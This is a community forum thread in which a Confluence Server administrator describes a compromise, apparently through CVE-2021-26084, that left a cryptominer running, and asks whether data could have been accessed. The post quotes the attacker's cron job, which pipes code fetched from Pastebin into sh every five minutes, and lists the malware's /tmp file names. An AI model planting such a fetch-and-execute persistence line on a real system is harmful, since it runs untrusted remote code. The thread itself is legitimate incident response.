Hello everyone,
we are self-hosting Confluence Server for our few users and were noticing a crash of our instance last Friday (2021-09-10). Yesterday (2021-09-13) we discovered some suspicious processes on our server seemingly started by the confluence user that were taking up 100% CPU on our server, leading to both our Confluence and our Jira crash again.
Based on our research until now and some Q/A that we read here, we are assuming that we were very likely hit by CVE-2021-26084 (https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html ) and someone managed to inject malicious processes on our server. We immediately killed all processes by the confluence user (including confluence itself) and found a Cron-Job for the confluence user, pulling down something from Pastebin and executing the code:
*/5 * * * * curl -fsSL https://pastebin.com/raw/<REDACTED> | sh
Next to that, we found suspicious files/folders in the /tmp-directory which were used by the processes:
/tmp/.solr
/tmp/.kkli
/tmp/conf.n
Our checks for malicious activities or files are still ongoing. Obviously we are trying to take all necessary measurements and find out whether and how much data from our Confluence itself was accessed.
Using the exploit named in the linked CVEs, is it possible that the attacker had access to actual content from our Confluence? Since the malicious processes were running under the confluence user, it would theoretically be possible that the attacker could read the database configuration and access the data, no? We couldn't really find information about that in the linked articles so far.
Thank you in advance for your help!
We talked about the original exploit in this thread: https://community.atlassian.com/t5/Confluence-questions/No-access-to-Conlfuence-Webpage-100-CPU-usage-from-quot-dbused/qaq-p/1793393?utm_source=atlcomm&utm_medium=email&utm_campaign=immediate_general_answer&utm_content=topic
In it, one of the Community members gave some details about the original malware. It was a cryptocurrency miner. https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/
It's theoretically possible that data was accessed, but so far, these seem to be the adverse effects
Online forums and learning are now in one easy-to-use experience.
By continuing, you accept the updated Community Terms of Use and acknowledge the Privacy Policy. Your public name, photo, and achievements may be publicly visible and available in search engines.
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.